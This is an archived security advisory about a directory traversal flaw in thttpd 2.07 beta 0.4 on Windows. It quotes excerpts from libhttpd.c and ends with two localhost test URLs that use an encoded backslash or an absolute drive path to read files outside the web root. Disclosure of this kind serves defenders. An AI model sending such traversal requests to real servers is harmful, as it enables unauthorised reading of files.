thttpd version 2.07 beta 0.4 on Windows is susceptible to a directory traversal attack.
8ce037e5fde72e96c8c9a8d297d49ac93812fff192124870c7ada125fbc0c01eApplication: thttpd
Vendors: http://www.acme.com/software/thttpd/
Version: 2.07 beta 0.4 10dec99
Platforms: Windows
Bug: Directory Traversal
Date: 2004-08-04
Author: CoolICE
e-mail: CoolICE#China.com
================
Content:
in libhttpd.c:
int
httpd_parse_request( httpd_conn* hc )
[...]
if ( hc->decodedurl[0] != '/' )
{
httpd_send_err( hc, 400, httpd_err400title, httpd_err400form, "" );
return -1;
}
static int
really_start_request( httpd_conn* hc )
[...]
if ( stat( hc->expnfilename, &hc->sb ) < 0 )
{
httpd_send_err( hc, 500, err500title, err500form, hc->encodedurl );
return -1;
}
------------------
TestCode:
http://localhost/%5c../test.ini
http://localhost/c:\test.ini
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed